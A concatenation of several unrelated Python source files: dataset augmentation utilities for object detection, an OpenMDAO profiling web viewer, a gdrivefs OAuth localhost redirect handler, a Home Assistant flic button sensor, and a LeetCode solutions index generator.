        # filter candidates: drop boxes that became too small/thin/clipped
        i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10)
        targets = targets[i]
        targets[:, 1:5] = new[i]

    return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16):  # box1(4,n), box2(4,n)
    """
    Boolean mask of boxes that survived augmentation.

    box1 are the boxes before augmentation, box2 after; a box is kept if it
    is at least *wh_thr* pixels in both dimensions, retained more than
    *area_thr* of its original area, and has aspect ratio below *ar_thr*.
    """
    pre_w = box1[2] - box1[0]
    pre_h = box1[3] - box1[1]
    post_w = box2[2] - box2[0]
    post_h = box2[3] - box2[1]
    aspect = np.maximum(post_w / (post_h + eps), post_h / (post_w + eps))  # aspect ratio
    big_enough = (post_w > wh_thr) & (post_h > wh_thr)
    area_kept = post_w * post_h / (pre_w * pre_h + eps) > area_thr
    return big_enough & area_kept & (aspect < ar_thr)  # candidates
def cutout(image, labels):
    """
    Apply cutout augmentation (https://arxiv.org/abs/1708.04552) in place.

    Paints random rectangles of random color over *image* and returns the
    label rows that are not obscured by more than 60% (for the non-tiny
    masks).
    """
    h, w = image.shape[:2]

    def bbox_ioa(box1, box2):
        """Intersection of box1 with each row of box2, normalized by box2's area (boxes are x1y1x2y2)."""
        box2 = box2.transpose()
        b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
        b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]

        inter = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
                (np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
        area2 = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
        return inter / area2

    # Mask sizes as fractions of the image: one 1/2, two 1/4, four 1/8, ...
    scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16
    for frac in scales:
        mask_h = random.randint(1, int(h * frac))
        mask_w = random.randint(1, int(w * frac))

        # Random box, clipped to the image.
        xmin = max(0, random.randint(0, w) - mask_w // 2)
        ymin = max(0, random.randint(0, h) - mask_h // 2)
        xmax = min(w, xmin + mask_w)
        ymax = min(h, ymin + mask_h)

        # Paint the region with a random mid-range color.
        image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]

        # Drop labels covered >60% by this mask (only for non-tiny masks).
        if len(labels) and frac > 0.03:
            box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
            ioa = bbox_ioa(box, labels[:, 1:5])
            labels = labels[ioa < 0.60]

    return labels
def create_folder(path='./new'):
    """Create an empty folder at *path*, deleting any existing folder there first."""
    if os.path.exists(path):
        shutil.rmtree(path)  # delete output folder
    os.makedirs(path)  # make new output folder
def flatten_recursive(path='../coco128'):
    """
    Flatten a directory tree: copy every file found (recursively) under
    *path* into a fresh sibling directory named '<path>_flat'.
    """
    flat_dir = Path(f'{path}_flat')
    create_folder(flat_dir)  # wipes any previous '<path>_flat'
    pattern = str(Path(path)) + '/**/*.*'
    for src in tqdm(glob.glob(pattern, recursive=True)):
        shutil.copyfile(src, flat_dir / Path(src).name)
def extract_boxes(path='../coco128/'):  # from utils.datasets import *; extract_boxes('../coco128')
    # Convert detection dataset into classification dataset, with one directory per class
    """
    Crop every labelled box out of a detection dataset and save it under
    <path>/classifier/<class_id>/ as a JPEG, producing a classification
    dataset with one directory per class.
    """
    path = Path(path)  # images dir
    shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None  # remove existing
    files = list(path.rglob('*.*'))
    n = len(files)  # number of files
    for im_file in tqdm(files, total=n):
        if im_file.suffix[1:] in img_formats:
            # image
            im = cv2.imread(str(im_file))[..., ::-1]  # BGR to RGB
            h, w = im.shape[:2]

            # labels
            lb_file = Path(img2label_paths([str(im_file)])[0])
            if Path(lb_file).exists():
                with open(lb_file, 'r') as f:
                    lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32)  # labels

                for j, x in enumerate(lb):
                    c = int(x[0])  # class
                    f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg'  # new filename
                    if not f.parent.is_dir():
                        f.parent.mkdir(parents=True)

                    b = x[1:] * [w, h, w, h]  # box
                    # b[2:] = b[2:].max()  # rectangle to square
                    b[2:] = b[2:] * 1.2 + 3  # pad
                    # NOTE(review): np.int is deprecated/removed in modern NumPy; int works.
                    b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)

                    b[[0, 2]] = np.clip(b[[0, 2]], 0, w)  # clip boxes outside of image
                    b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
                    assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0)):  # from utils.datasets import *; autosplit('../coco128')
    """ Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
    # Arguments
        path:       Path to images directory
        weights:    Train, val, test weights (list)
    """
    path = Path(path)  # images dir
    files = list(path.rglob('*.*'))
    n = len(files)  # number of files
    # Each image is assigned independently at random, so actual split sizes
    # only approximate the requested weights.
    indices = random.choices([0, 1, 2], weights=weights, k=n)  # assign each image to a split
    txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt']  # 3 txt files
    [(path / x).unlink() for x in txt if (path / x).exists()]  # remove existing
    for i, img in tqdm(zip(indices, files), total=n):
        if img.suffix[1:] in img_formats:
            with open(path / txt[i], 'a') as f:
                f.write(str(img) + '\n')  # add image to txt file
|
iprofile_app.py | from __future__ import print_function
import os
import sys
import time
import webbrowser
import threading
import json
from six import iteritems, itervalues
try:
import tornado
import tornado.ioloop
import tornado.web
except ImportError:
tornado = None
from collections import defaultdict, deque
from itertools import groupby
from openmdao.devtools.iprofile import _process_profile, _iprof_py_file
from openmdao.devtools.iprof_utils import func_group, _setup_func_group
from openmdao.utils.mpi import MPI
def _launch_browser(port):
    """
    Open the default web browser to localhost:<port>
    """
    time.sleep(1)  # give the server a moment to come up first
    url = 'http://localhost:%s' % port
    webbrowser.get().open(url)
def _startThread(fn):
    """
    Start a daemon thread running the given function.

    Parameters
    ----------
    fn : callable
        Function to execute in the background thread.

    Returns
    -------
    threading.Thread
        The already-started daemon thread.
    """
    thread = threading.Thread(target=fn)
    # Thread.setDaemon() is deprecated (Python 3.10+); set the attribute directly.
    thread.daemon = True
    thread.start()
    return thread
def _parent_key(d):
    """
    Return the function path of the parent of function specified by 'id' in the given dict.
    """
    parent_path, sep, _leaf = d['id'].rpartition('|')
    # rpartition yields ('', '', id) when there is no '|', i.e. a root node.
    return parent_path
def _stratify(call_data, sortby='time'):
    """
    Group node data by depth and sort within a depth by parent and 'sortby'.

    Nodes are annotated in place with normalized layout extents
    (x0/x1/y0/y1 in [0, 1]) and an 'idx' into the returned flat node list.

    Parameters
    ----------
    call_data : dict
        Maps call path ('a|b|c') to a node dict containing at least 'id',
        'depth' and the *sortby* key; must include a '$total' root entry.
    sortby : str
        Node key used to size and order siblings (default 'time').

    Returns
    -------
    (list of dict, list of dict)
        Per-depth dicts of parent path -> children (sorted descending by
        *sortby*), and the flat node list indexed by each node's 'idx'.

    Changes from the original: removed the unused local 'y', the unused
    enumerate() counter, and the py2-era six.iteritems in favor of .items().
    """
    depth_groups = []
    node_list = []  # all nodes in a single list

    depthfunc = lambda d: d['depth']
    for key, group in groupby(sorted(call_data.values(), key=depthfunc), key=depthfunc):
        # now further group each group by parent, then sort those in descending order
        # by 'sortby'
        depth_groups.append({
            key: sorted(sub, key=lambda d: d[sortby], reverse=True)
            for key, sub in groupby(sorted(group, key=_parent_key), key=_parent_key)
        })

    max_depth = len(depth_groups)
    delta_y = 1.0 / max_depth
    max_x = call_data['$total'][sortby]

    for depth, pardict in enumerate(depth_groups):
        y0 = delta_y * depth
        y1 = y0 + delta_y
        for parent, children in pardict.items():
            # children start at their parent's x0 (roots start at 0)
            end_x = call_data[parent]['x0'] * max_x if parent else 0
            for node in children:
                start_x = end_x
                end_x += node[sortby]
                node['x0'] = start_x / max_x
                node['x1'] = end_x / max_x
                node['y0'] = y0
                node['y1'] = y1
                node['idx'] = len(node_list)
                node_list.append(node)

    return depth_groups, node_list
def _iprof_setup_parser(parser):
    """
    Register the 'iprof' command-line options on *parser*.

    Lazily populates the global func_group table first so the --group help
    text can list the available method groups.
    """
    if not func_group:
        _setup_func_group()

    parser.add_argument('-p', '--port', action='store', dest='port',
                        default=8009, type=int,
                        help='port used for web server')
    parser.add_argument('--no_browser', action='store_true', dest='noshow',
                        help="Don't pop up a browser to view the data.")
    parser.add_argument('-t', '--title', action='store', dest='title',
                        default='Profile of Method Calls by Instance',
                        help='Title to be displayed above profiling view.')
    parser.add_argument('-g', '--group', action='store', dest='methods',
                        default='openmdao',
                        help='Determines which group of methods will be tracked. Current '
                             'options are: %s and "openmdao" is the default' %
                             sorted(func_group.keys()))
    parser.add_argument('-m', '--maxcalls', action='store', dest='maxcalls',
                        default=15000, type=int,
                        help='Maximum number of calls displayed at one time. Default=15000.')
    parser.add_argument('file', metavar='file', nargs='+',
                        help='Raw profile data files or a python file.')
if tornado is None:
def _iprof_exec(options, user_args):
"""
Called from a command line to instance based profile data in a web page.
"""
raise RuntimeError("The 'iprof' function requires the 'tornado' package. "
"You can install it using 'pip install tornado'.")
else:
class _Application(tornado.web.Application):
def __init__(self, options):
self.call_data, _ = _process_profile(options.file)
self.depth_groups, self.node_list = _stratify(self.call_data)
self.options = options
# assemble our call_data nodes into a tree structure, where each
# entry contains that node's call data and a dict containing each
# child keyed by call path.
self.call_tree = tree = defaultdict(lambda : [None, {}])
for path, data in iteritems(self.call_data):
data['id'] = path
parts = path.rsplit('|', 1)
# add our node to our parent
if len(parts) > 1:
tree[parts[0]][1][path] = data
tree[path][0] = data
handlers = [
(r"/", _Index),
(r"/func/([0-9]+)", _Function),
]
settings = dict(
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
)
super(_Application, self).__init__(handlers, **settings)
def get_nodes(self, idx):
"""
Yield all children of the given root up to a maximum number stored in options.maxcalls.
"""
if idx == 0:
root = self.call_tree['$total']
else:
root = self.node_list[idx]
root = self.call_tree[root['id']]
maxcalls = self.options.maxcalls
stack = deque()
stack.appendleft(root)
callcount = 1
stop_adding = False
while stack:
parent, children = stack.pop()
yield parent
if not stop_adding:
callcount += len(children)
if callcount <= maxcalls:
for child in itervalues(children):
stack.appendleft(self.call_tree[child['id']])
else:
stop_adding = True
class _Index(tornado.web.RequestHandler):
def get(self):
"""
Load the page template and request call data nodes starting at idx=0.
"""
app = self.application
self.render("iprofview.html", title=app.options.title)
class _Function(tornado.web.RequestHandler):
def get(self, idx):
"""
Request an updated list of call data nodes, rooted at the node specified by idx.
"""
app = self.application
dump = json.dumps(list(app.get_nodes(int(idx))))
self.set_header('Content-Type', 'application/json')
self.write(dump)
def _iprof_exec(options, user_args):
    """
    Called from a command line to view instance-based profile data in a web page.

    If given a ``.py`` file, run it under the profiler first, then (on rank 0
    when under MPI) serve the collected ``iprof.N`` data and open a browser.
    """
    if options.file[0].endswith('.py'):
        # Only a single script may be profiled at a time.
        if len(options.file) > 1:
            print("iprofview can only process a single python file.", file=sys.stderr)
            sys.exit(-1)
        _iprof_py_file(options, user_args)
        # The profiler writes one iprof.<rank> file per MPI process.
        if MPI:
            options.file = ['iprof.%d' % i for i in range(MPI.COMM_WORLD.size)]
        else:
            options.file = ['iprof.0']
    # Only one process (rank 0 under MPI) serves the results.
    if not options.noshow and (not MPI or MPI.COMM_WORLD.rank == 0):
        app = _Application(options)
        app.listen(options.port)
        print("starting server on port %d" % options.port)
        serve_thread = _startThread(tornado.ioloop.IOLoop.current().start)
        _startThread(lambda: _launch_browser(options.port))
        # BUG FIX: Thread.isAlive() was removed in Python 3.9; use is_alive().
        # Join with a timeout so Ctrl-C remains responsive.
        while serve_thread.is_alive():
            serve_thread.join(timeout=1)
|
auto_auth.py | import logging
import threading
import webbrowser
import time
import urllib.parse
import socketserver
import http.server
import io
import gdrivefs.oauth_authorize
import gdrivefs.conf
_LOGGER = logging.getLogger(__name__)
class _HTTPRequest(http.server.BaseHTTPRequestHandler):
def __init__(self, request_text):
self.rfile = io.StringIO(request_text)
self.raw_requestline = self.rfile.readline()
self.error_code = self.error_message = None
self.parse_request()
class _WebserverMonitor(object):
    """One-shot local webserver that captures Google's OAuth redirect.

    Runs a TCP server on an ephemeral localhost port in a background thread,
    waits for the browser to come back with the ``code`` query argument,
    records it, and can then be stopped.
    """

    def __init__(self, filepath):
        # Credentials target path (not used by the server itself; the caller
        # performs the exchange/persist step) — kept for parity with callers.
        self.__filepath = filepath
        # Allows us to be in sync when starting and stopping the thread.
        self.__server_state_e = threading.Event()
        self.__t = threading.Thread(target=self.__thread)
        self._port = None
        # Signaled when the authorization response is received.
        self._request_state_e = threading.Event()
        # Will be assigned with the response from Google.
        self._http_status_raw = None

    def start(self):
        """Start the server thread and block until it is listening."""
        self.__t.start()
        # Wait for the loop to change the event state.
        _LOGGER.debug("Waiting for thread to start.")
        self.__server_state_e.wait()
        _LOGGER.debug("Server is now running.")
        self.__server_state_e.clear()

    def stop(self):
        """Shut the server down and block until the thread exits."""
        assert \
            self.__server_state_e is not None, \
            "Thread doesn't appear to have ever been started."
        assert \
            self.__t.is_alive() is True, \
            "Thread doesn't appear to be running."
        self.__server_state_e.clear()
        self.__s.shutdown()
        # Wait for the loop to change the event state.
        _LOGGER.debug("Waiting for thread to stop.")
        self.__server_state_e.wait()
        _LOGGER.debug("Server is no longer running.")
        self.__server_state_e.clear()

    def __thread(self):
        """Where the main loop lives."""
        _LOGGER.debug("Webserver is starting.")
        monitor = self

        # Embedding this because it's so trivial.
        class Handler(http.server.BaseHTTPRequestHandler):
            def do_GET(self):
                # We have the first line of the response with the authorization code
                # passed as a query argument.
                #
                # Example:
                #
                #   GET /?code=4/clwm0rESq8sqeC-JxIcfiSdjh2593hLej9CZxAcbe1A HTTP/1.1
                #
                # Use Python to parse the request. We need to add one newline for the
                # line and another for a subsequent blank line to terminate the block
                # and conform with the RFC.
                hr = _HTTPRequest(self.requestline + "\n\n")
                u = urllib.parse.urlparse(hr.path)
                arguments = urllib.parse.parse_qs(u.query)
                # It's not an authorization response. Bail with the same error
                # the library would normally send for unhandled requests.
                if 'code' not in arguments:
                    self.send_error(
                        501,
                        "Unsupported method ({}): {}".format(
                            self.command, hr.path))
                    return
                authcode = arguments['code'][0]
                _LOGGER.debug("Received authcode [{}]".format(authcode))
                monitor._authcode = authcode
                monitor._request_state_e.set()
                self.send_response(200, message='OK')
                self.send_header("Content-type", 'text/html')
                self.end_headers()
                # BUG FIX: wfile is a *binary* stream on Python 3 — writing a
                # str raised TypeError. Encode the response body to bytes.
                self.wfile.write("""\
<html>
<head></head>
<body>
GDFS authorization recorded.
</body>
</html>
""".encode())

            def log_message(self, format, *args):
                # Silence the default per-request stderr logging.
                pass

        class Server(socketserver.TCPServer):
            def server_activate(self, *args, **kwargs):
                r = socketserver.TCPServer.server_activate(self, *args, **kwargs)
                # Sniff the port, now that we're running.
                monitor._port = self.server_address[1]
                return r

        # Our little webserver. (0) for the port will automatically assign it
        # to some unused port.
        binding = ('localhost', 0)
        self.__s = Server(binding, Handler)
        _LOGGER.debug("Created server.")
        # Signal the startup routine that we're starting.
        self.__server_state_e.set()
        _LOGGER.debug("Running server.")
        self.__s.serve_forever()
        _LOGGER.debug("Webserver is stopping.")
        # Signal the startup routine that we're stopping.
        self.__server_state_e.set()

    @property
    def port(self):
        assert \
            self._port is not None, \
            "Thread hasn't been started or a port hasn't been assigned."
        return self._port

    @property
    def request_state_e(self):
        return self._request_state_e

    @property
    def authcode(self):
        return self._authcode
class AutoAuth(object):
    """Knows how to open the browser, authorize the application (prompting the
    user if necessary), redirect, receive the response, and store the
    credentials.
    """

    def get_and_write_creds(self):
        """Run the complete browser-based OAuth flow and persist the result."""
        _LOGGER.info("Requesting authorization.")
        creds_filepath = gdrivefs.conf.Conf.get('auth_cache_filepath')
        # Local webserver that will catch Google's redirect.
        wm = _WebserverMonitor(creds_filepath)
        wm.start()
        # Point the OAuth flow back at our ephemeral local port.
        redirect_uri = 'http://localhost:{}'.format(wm.port)
        oa = gdrivefs.oauth_authorize.OauthAuthorize(
                redirect_uri=redirect_uri)
        url = oa.step1_get_auth_url()
        _LOGGER.debug("Opening browser: [{}]".format(url))
        webbrowser.open(url)
        # Poll instead of blocking on the event so the user can break out
        # with a simple interrupt; the webserver is always torn down.
        try:
            while not wm.request_state_e.is_set():
                time.sleep(1)
            authcode = wm.authcode
        finally:
            wm.stop()
        # Finish the authorization from our side and record.
        oa.step2_doexchange(authcode)
        _LOGGER.info("Authorization complete.")
|
binary_sensor.py | """Support to use flic buttons as a binary sensor."""
import logging
import threading
from pyflic import (
ButtonConnectionChannel,
ClickType,
ConnectionStatus,
FlicClient,
ScanWizard,
ScanWizardResult,
)
import voluptuous as vol
from homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorDevice
from homeassistant.const import (
CONF_DISCOVERY,
CONF_HOST,
CONF_PORT,
CONF_TIMEOUT,
EVENT_HOMEASSISTANT_STOP,
)
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)

# Max age (seconds) a queued/offline-buffered click may have before being dropped.
DEFAULT_TIMEOUT = 3

# Click-type strings used both in fired events and in the ignore list.
CLICK_TYPE_SINGLE = "single"
CLICK_TYPE_DOUBLE = "double"
CLICK_TYPE_HOLD = "hold"
CLICK_TYPES = [CLICK_TYPE_SINGLE, CLICK_TYPE_DOUBLE, CLICK_TYPE_HOLD]

# Config key: click types that should not fire bus events.
CONF_IGNORED_CLICK_TYPES = "ignored_click_types"

# Defaults for connecting to the flicd daemon.
DEFAULT_HOST = "localhost"
DEFAULT_PORT = 5551

# Event name and payload keys fired on the Home Assistant bus.
EVENT_NAME = "flic_click"
EVENT_DATA_NAME = "button_name"
EVENT_DATA_ADDRESS = "button_address"
EVENT_DATA_TYPE = "click_type"
EVENT_DATA_QUEUED_TIME = "queued_time"

# Platform configuration schema for this component.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {
        vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
        vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
        vol.Optional(CONF_DISCOVERY, default=True): cv.boolean,
        vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,
        vol.Optional(CONF_IGNORED_CLICK_TYPES): vol.All(
            cv.ensure_list, [vol.In(CLICK_TYPES)]
        ),
    }
)
def setup_platform(hass, config, add_entities, discovery_info=None):
    """Set up the flic platform."""
    # Connect to the flicd server that owns the physical buttons.
    host = config.get(CONF_HOST)
    port = config.get(CONF_PORT)
    try:
        client = FlicClient(host, port)
    except ConnectionRefusedError:
        _LOGGER.error("Failed to connect to flic server")
        return

    # Every newly verified button becomes an entity.
    client.on_new_verified_button = (
        lambda address: setup_button(hass, config, add_entities, client, address)
    )
    if config.get(CONF_DISCOVERY):
        start_scanning(config, add_entities, client)

    # Tear the client down with Home Assistant, and pump pyflic events
    # on a dedicated thread.
    hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, lambda event: client.close())
    threading.Thread(target=client.handle_events).start()

    def _add_verified_buttons(items):
        """Add entities for already verified buttons."""
        for address in items["bd_addr_of_verified_buttons"] or []:
            setup_button(hass, config, add_entities, client, address)

    # Get addresses of already verified buttons
    client.get_info(_add_verified_buttons)
def start_scanning(config, add_entities, client):
    """Start a new flic client for scanning and connecting to new buttons."""
    wizard = ScanWizard()

    def _on_completed(scan_wizard, result, address, name):
        """Restart scan wizard to constantly check for new buttons."""
        if result == ScanWizardResult.WizardSuccess:
            _LOGGER.info("Found new button %s", address)
        elif result != ScanWizardResult.WizardFailedTimeout:
            _LOGGER.warning(
                "Failed to connect to button %s. Reason: %s", address, result
            )
        # Restart scan wizard
        start_scanning(config, add_entities, client)

    wizard.on_completed = _on_completed
    client.add_scan_wizard(wizard)
def setup_button(hass, config, add_entities, client, address):
    """Set up a single button device."""
    button = FlicButton(
        hass,
        client,
        address,
        config.get(CONF_TIMEOUT),
        config.get(CONF_IGNORED_CLICK_TYPES),
    )
    _LOGGER.info("Connected to button %s", address)
    add_entities([button])
class FlicButton(BinarySensorDevice):
    """Representation of a flic button."""

    def __init__(self, hass, client, address, timeout, ignored_click_types):
        """Initialize the flic button."""
        self._hass = hass
        self._address = address
        # Max seconds a queued event may age before being dropped.
        self._timeout = timeout
        # True while the physical button is pressed (drives is_on).
        self._is_down = False
        self._ignored_click_types = ignored_click_types or []
        # Map pyflic click types onto the strings fired on the event bus.
        self._hass_click_types = {
            ClickType.ButtonClick: CLICK_TYPE_SINGLE,
            ClickType.ButtonSingleClick: CLICK_TYPE_SINGLE,
            ClickType.ButtonDoubleClick: CLICK_TYPE_DOUBLE,
            ClickType.ButtonHold: CLICK_TYPE_HOLD,
        }
        self._channel = self._create_channel()
        client.add_connection_channel(self._channel)

    def _create_channel(self):
        """Create a new connection channel to the button."""
        channel = ButtonConnectionChannel(self._address)
        channel.on_button_up_or_down = self._on_up_down
        # If all types of clicks should be ignored, skip registering callbacks
        if set(self._ignored_click_types) == set(CLICK_TYPES):
            return channel
        # pyflic offers combined callbacks; pick the one excluding the
        # ignored type so those events never reach us at all.
        if CLICK_TYPE_DOUBLE in self._ignored_click_types:
            # Listen to all but double click type events
            channel.on_button_click_or_hold = self._on_click
        elif CLICK_TYPE_HOLD in self._ignored_click_types:
            # Listen to all but hold click type events
            channel.on_button_single_or_double_click = self._on_click
        else:
            # Listen to all click type events
            channel.on_button_single_or_double_click_or_hold = self._on_click
        return channel

    @property
    def name(self):
        """Return the name of the device."""
        return f"flic_{self.address.replace(':', '')}"

    @property
    def address(self):
        """Return the bluetooth address of the device."""
        return self._address

    @property
    def is_on(self):
        """Return true if sensor is on."""
        return self._is_down

    @property
    def should_poll(self):
        """No polling needed."""
        return False

    @property
    def device_state_attributes(self):
        """Return device specific state attributes."""
        return {"address": self.address}

    def _queued_event_check(self, click_type, time_diff):
        """Generate a log message and returns true if timeout exceeded."""
        # NOTE(review): the ':d' format assumes time_diff is an int number of
        # seconds — it would raise on a float; confirm against pyflic.
        time_string = f"{time_diff:d} {'second' if time_diff == 1 else 'seconds'}"
        if time_diff > self._timeout:
            _LOGGER.warning(
                "Queued %s dropped for %s. Time in queue was %s",
                click_type,
                self.address,
                time_string,
            )
            return True
        _LOGGER.info(
            "Queued %s allowed for %s. Time in queue was %s",
            click_type,
            self.address,
            time_string,
        )
        return False

    def _on_up_down(self, channel, click_type, was_queued, time_diff):
        """Update device state, if event was not queued."""
        if was_queued and self._queued_event_check(click_type, time_diff):
            return
        self._is_down = click_type == ClickType.ButtonDown
        self.schedule_update_ha_state()

    def _on_click(self, channel, click_type, was_queued, time_diff):
        """Fire click event, if event was not queued."""
        # Return if click event was queued beyond allowed timeout
        if was_queued and self._queued_event_check(click_type, time_diff):
            return
        # Return if click event is in ignored click types
        hass_click_type = self._hass_click_types[click_type]
        if hass_click_type in self._ignored_click_types:
            return
        self._hass.bus.fire(
            EVENT_NAME,
            {
                EVENT_DATA_NAME: self.name,
                EVENT_DATA_ADDRESS: self.address,
                EVENT_DATA_QUEUED_TIME: time_diff,
                EVENT_DATA_TYPE: hass_click_type,
            },
        )

    def _connection_status_changed(self, channel, connection_status, disconnect_reason):
        """Remove device, if button disconnects."""
        # NOTE(review): this handler is never assigned to the channel in
        # _create_channel — confirm whether pyflic wires it by name or
        # whether this is dead code.
        if connection_status == ConnectionStatus.Disconnected:
            _LOGGER.warning(
                "Button (%s) disconnected. Reason: %s", self.address, disconnect_reason
            )
|
table_of_solutions.py | #!/usr/bin/env python3.8
# -*- coding: UTF-8 -*-
# 生成用于README.md文件的解法文件目录
# 通过扫描src的子文件夹,解析文件名,生成Markdown规范的文件
import abc
import datetime
import enum
import hashlib
import re
import sys
from contextlib import contextmanager
from typing import *
import git
def _emit(stream, message, args):
    """Print the %-formatted message to the given stream."""
    print(message % args, file=stream)


def info(message, *args):
    """Informational message, written to stdout."""
    _emit(sys.stdout, message, args)


def warn(message, *args):
    """Warning message, written to stderr."""
    _emit(sys.stderr, message, args)


def error(message, *args):
    """Error message, written to stderr."""
    _emit(sys.stderr, message, args)
class Language(enum.Enum):
    """Programming language a solution is written in.

    NOTE: the auto() values serve as a sort key for the link footer
    (see MarkdownTableGenerator), so member order is significant.
    """
    Kotlin = enum.auto()
    Java = enum.auto()
    Python = enum.auto()
    MySQL = enum.auto()
    Bash = enum.auto()
class Metadata:
    """Metadata of one problem as returned by the LeetCode API.

    Built from an indexable 5-field record:
    (id, frontend_id, title, slug, difficulty).

    :type id: int
    :type frontend_id: str
    :type title: str
    :type slug: str
    :type difficulty: int
    :type site_url: str
    """

    def __init__(self, metadata):
        # Unpack the record in one statement: numeric id, id shown in the
        # web UI, title, URL-friendly English name, difficulty level.
        (self.id,
         self.frontend_id,
         self.title,
         self.slug,
         self.difficulty) = metadata[:5]
        # Canonical problem page on leetcode-cn.
        self.site_url = f"https://leetcode-cn.com/problems/{self.slug}/"

    def __repr__(self) -> str:
        stars = '★' * self.difficulty
        return f"Id.{self.id}: [{self.slug}] {self.title} {stars}"
class Solution:
    """A single solution file for one problem.

    Built from an indexable 4-field record:
    (problem_no, category, solution, last_upd).

    :type problem_no: int
    :type category: Language
    :type solution: str
    :type last_upd: datetime.datetime
    """

    def __init__(self, metadata_):
        # problem number, language, repo-relative file path, last commit time
        (self.problem_no,
         self.category,
         self.solution,
         self.last_upd) = metadata_[:4]

    def __repr__(self) -> str:
        return (f"No.{self.problem_no}: [{self.category}] "
                f"{self.solution} @ {self.last_upd}")
class Problem:
    """One LeetCode problem plus every implemented solution for it.

    Equality, hashing and ordering are all based on ``ordinal``.

    :type ordinal: int
    :type display: str
    :type solutions: list of Solution
    :type metadata: Metadata or None
    """

    def __init__(self, metadata_):
        # Real ordinal and display name come from the directory name.
        self.ordinal, self.display = metadata_[:2]
        # Solutions discovered so far.
        self.solutions = []
        # API metadata; stays None until resolved remotely.
        self.metadata = None

    @property
    def site_url(self) -> Optional[str]:
        """URL of the problem page, or None when metadata is unresolved."""
        return self.metadata.site_url if self.metadata else None

    def __eq__(self, o: object) -> bool:
        return isinstance(o, self.__class__) and self.ordinal == o.ordinal

    def __hash__(self) -> int:
        return self.ordinal

    def __lt__(self, o: object) -> bool:
        return isinstance(o, Problem) and self.ordinal < o.ordinal

    def __repr__(self) -> str:
        return f"No.{self.ordinal}: {self.display} ({len(self.solutions)})"
def scan_for_problems():
    """Scan the git tree under ``solution/`` and collect all problems.

    While the tree is being scanned, problem metadata is fetched from the
    LeetCode API on a background thread and attached to each Problem.

    :return: all discovered problems, sorted by ordinal.
    """
    solutions: Dict[int, Problem] = {}
    repo = git.Repo('.')

    def scan_for_solutions_internal(root_tree, what_todo):
        """Apply *what_todo* to every non-hidden entry of *root_tree*.

        :type root_tree: git.Tree
        :type what_todo: (git.Blob) -> None
        """
        for blob in root_tree:
            if not blob.name.startswith('.'):
                what_todo(blob)

    def scan_language_dir(tree):
        """Handle one ``#<ordinal> <title>`` problem directory.

        :type tree: git.Blob | git.Tree
        """
        if not isinstance(tree, git.Tree):
            return
        if search := re.search(r"#(\d+) (.+)", tree.name):
            ordinal = int(search.group(1))
            title = search.group(2)
        else:
            return
        # BUG FIX: the original only rebound ``problem`` when the ordinal was
        # new; for an already-seen ordinal the lambda below captured the
        # *title string* and scan_solution_file then failed on it. Always
        # resolve to the Problem object stored in the map.
        if ordinal not in solutions:
            solutions[ordinal] = Problem((ordinal, title,))
        problem = solutions[ordinal]
        scan_for_solutions_internal(
            tree, lambda p: scan_solution_file(problem, p))

    def scan_solution_file(problem, blob):
        """Register *blob* as a solution of *problem*, if it is a file.

        :type problem: Problem
        :type blob: git.Blob | git.Tree
        """
        if not isinstance(blob, git.Blob):
            return
        # Most recent commit touching this path gives the update time.
        commit = next(repo.iter_commits(paths=blob.path, max_count=1))
        category = resolve_language(blob.name)
        filepath = blob.path
        last_upd = commit.authored_datetime
        if category is None:
            warn("Cannot resolve language category for %s", filepath)
            return
        solution = Solution((problem.ordinal, category, filepath, last_upd))
        problem.solutions.append(solution)

    def resolve_language(file_name: str):
        """Map a file-name suffix to a Language, or None when unknown."""
        return next(iter([v for k, v in {
            '.java'     : Language.Java,
            '.kt'       : Language.Kotlin,
            '.py'       : Language.Python,
            '.bash.sh'  : Language.Bash,
            '.mysql.sql': Language.MySQL,
        }.items() if file_name.endswith(k)]), None)

    @contextmanager
    def fetch_metadata_from_remote():
        """Fetch API metadata concurrently with the tree scan, then attach it."""
        import threading
        metadata: Dict[int, Metadata] = {}

        def thread_function(sink: Dict[int, Metadata]):
            import requests
            resp = requests.get("https://leetcode-cn.com/api/problems/all")
            for stat_obj in resp.json()["stat_status_pairs"]:
                stat = stat_obj["stat"]
                diff = stat_obj["difficulty"]
                sink[stat["question_id"]] = Metadata((
                    stat["question_id"],
                    stat["frontend_question_id"],
                    stat["question__title"],
                    stat["question__title_slug"],
                    diff["level"],
                ))

        future = threading.Thread(target=thread_function, args=(metadata,))
        future.start()
        yield
        # Join before attaching so the metadata dict is fully populated.
        future.join()
        for problem in solutions.values():
            if (data := metadata.get(problem.ordinal, None)) is not None:
                problem.metadata = data
            else:
                error("could not found metadata for %s", problem)

    with fetch_metadata_from_remote():
        scan_for_solutions_internal(repo.tree() / 'solution', scan_language_dir)
    return sorted(solutions.values())
